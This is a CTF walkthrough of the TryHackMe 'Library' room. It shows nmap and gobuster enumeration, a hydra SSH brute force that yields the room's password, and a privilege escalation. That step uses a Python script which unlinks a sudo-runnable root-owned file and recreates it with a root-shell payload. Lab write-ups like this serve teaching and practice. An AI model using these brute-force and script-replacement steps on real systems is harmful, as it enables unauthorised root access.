Library — CTF Walkthrough — TryHackMe

Atharva Varule
5 min read · Mar 19, 2021

Welcome to my very first writeup, a walkthrough of the TryHackMe room Library.

So without further ado, let’s get into it.

Enumeration:

Our first step after booting the target is enumeration, using the familiar tool ‘nmap’ with default scripts and version detection:

nmap -sC -sV <ip>

We found that ports 22 and 80 are open, running SSH and HTTP respectively.

We can’t do anything with SSH yet because we don’t have credentials, so let’s browse to the IP.

We got the landing page:

http://<ip>/

This is a static web page without any functionality. Looking at the source code turned up nothing interesting. The only thing I noticed is the name mentioned on the page, “meliodas”. Keep that in mind.

Now let’s enumerate hidden directories and files using ‘gobuster’:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://<ip>/

Nothing interesting here except a ‘robots.txt’ file. Let’s check it out:

http://<ip>/robots.txt

The file contains the line ‘User-agent: rockyou’. This looks like a hint: we already have a username from the landing page, and here we are given the name of a wordlist, so the password is most likely in rockyou.txt. Let’s brute-force the SSH login with ‘hydra’:

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt <ip> -t 4 ssh

So we’ve got the password and can now log in over SSH. (‘-t 4’ keeps hydra to four parallel connections; OpenSSH throttles unauthenticated connections via MaxStartups, and hydra itself warns you to use ‘-t 4’ against ssh.)

Exploitation:

ssh meliodas@<ip>

Listing our home directory gives us the user flag:

meliodas@ubuntu:~$ ls -la

Privilege Escalation:

I enumerated further to find something exploitable.

Gathering more info about target

I searched for exploits against the kernel version and the Ubuntu release but didn’t find anything useful. Then I looked for files with the SUID bit set and for running cron jobs, but again nothing useful.

Files with SUID Bit set and Running Cron Jobs

Then I listed the commands I can run as root with sudo and found that I can run the Python file ‘bak.py’ as root:

meliodas@ubuntu:~$ sudo -l

I listed the contents of ‘bak.py’. Its task is to zip the contents of the ‘/var/www/html/’ directory and store the archive in ‘/var/backups/’ as ‘website.zip’:

meliodas@ubuntu:~$ cat /home/meliodas/bak.py

I tried to edit the file but got a Permission Denied error: the file is owned by root and is not writable by us. But what if we delete the original file and create a new one with the same name in the same directory? I tried it, and it succeeded. It works because removing or creating a directory entry is governed by the permissions of the directory, not of the file, and ‘/home/meliodas’ belongs to meliodas. (The same trick fails in a directory with the sticky bit set, such as /tmp, unless you own the file; a root-owned script referenced from sudoers should live in a root-owned directory.) So now we have a file we fully control, and sudo will still run it as root.

I replaced the file with one that spawns a shell instead of taking the backup. The final file looks like this:
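As an added example (my own code, not the file from the original post), the following script encodes the Unix rule the trick depends on and performs the unlink-and-recreate step. The payload (a Python one-liner that spawns /bin/bash, which is already running as root under sudo) and the default target path ‘/home/meliodas/bak.py’ are assumptions; the check function works on raw mode bits so it can be reasoned about without being root.

```python
#!/usr/bin/env python3
"""Replace a root-owned script that sudo lets us run, when its directory is ours.

Added example for this walkthrough, not the room's own files. It encodes the
Unix rule the trick relies on: unlink()/create are governed by the *directory's*
permission bits (w+x for the caller, minus the sticky-bit exception), not by the
file's own mode or owner. The target path and payload are assumptions.
"""
import os
import stat
import sys

# Assumed payload written into bak.py: under "sudo python /home/meliodas/bak.py"
# the interpreter already has euid 0, so a plain shell is a root shell.
PAYLOAD = "import os\nos.system('/bin/bash')\n"


def can_unlink(dir_mode, dir_uid, dir_gid, file_uid, uid, gids):
    """Pure check of the Unix rule for removing a directory entry.

    dir_mode: st_mode of the directory; dir_uid/dir_gid: its owner and group;
    file_uid: owner of the file being unlinked; uid/gids: the caller's ids.
    Root bypasses DAC entirely. Otherwise the caller needs write+search on the
    directory; with the sticky bit set it must also own the file or the directory.
    """
    if uid == 0:
        return True
    if dir_uid == uid:
        bits = (stat.S_IWUSR, stat.S_IXUSR)
    elif dir_gid in gids:
        bits = (stat.S_IWGRP, stat.S_IXGRP)
    else:
        bits = (stat.S_IWOTH, stat.S_IXOTH)
    if not all(dir_mode & b for b in bits):
        return False
    if dir_mode & stat.S_ISVTX:
        return file_uid == uid or dir_uid == uid
    return True


def explain(path):
    """Return (replaceable, reason) for the real file at `path` using the caller's ids."""
    d = os.path.dirname(os.path.abspath(path))
    sd, sf = os.stat(d), os.stat(path)
    uid, gids = os.geteuid(), set(os.getgroups()) | {os.getegid()}
    if os.access(path, os.W_OK):  # can we simply edit it in place?
        return True, "file itself is writable; edit it in place"
    if can_unlink(sd.st_mode, sd.st_uid, sd.st_gid, sf.st_uid, uid, gids):
        return True, "file not writable, but %s is: unlink and recreate" % d
    return False, "neither the file nor its directory is writable (or the sticky bit blocks it)"


def replace_script(path, payload=PAYLOAD):
    """Unlink the root-owned script and recreate it with our payload.

    Returns the new file's contents so the caller can verify what sudo will run.
    """
    os.unlink(path)               # needs w+x on the directory, not on the file
    with open(path, "w") as fh:   # new inode, owned by us
        fh.write(payload)
    with open(path) as fh:
        return fh.read()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/home/meliodas/bak.py"
    ok, why = explain(target)
    print("%s: %s" % (target, why))
    if ok and not os.access(target, os.W_OK):
        replace_script(target)
        print("replaced; now run: sudo python %s" % target)
```

Run it as meliodas with no arguments to see why the directory makes the root-owned file replaceable; the sudoers rule still names the same path, so ‘sudo python /home/meliodas/bak.py’ then executes our payload as root.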

Now when we run the file using ‘sudo’ it’ll give us a shell with root privileges. Let’s run it.

meliodas@ubuntu:~$ sudo python bak.py

Oops! We got an error, so we can’t run it like that.

Remember that the output of ‘sudo -l’ gave the absolute path of ‘bak.py’. sudo matches the command and its arguments literally against the sudoers entry, so ‘bak.py’ does not match ‘/home/meliodas/bak.py’ and the rule does not apply. We have to use the absolute path in our command as well:

meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py

And that’s it. We are root! This was a fairly easy CTF and very good for beginners.

Quick Recap:

First we enumerated the open ports on the target and found ports 22 and 80 open. Then we found the username “meliodas” on the landing page, and directory brute-forcing turned up a ‘robots.txt’ file. In it we found a hint that we could use the famous wordlist ‘rockyou.txt’ to brute-force the password, so we used hydra to brute-force the SSH password for “meliodas” and got “iloveyou1”. With that we gained access to the target and found the user flag. Then came privilege escalation: we enumerated the system and found a Python file we could run as root with sudo. The problem was that we could not edit the file, but because we owned its directory we could delete it and create a new file with the same name containing code that spawns a root shell. Running that file with sudo, using the absolute path from the sudoers entry, gave us root and full control over the target.

This CTF was not very difficult to solve. I hope you liked my writeup. From now on I’ll be publishing more CTF walkthroughs, so if you liked this, do follow me. Thank you for reading :)
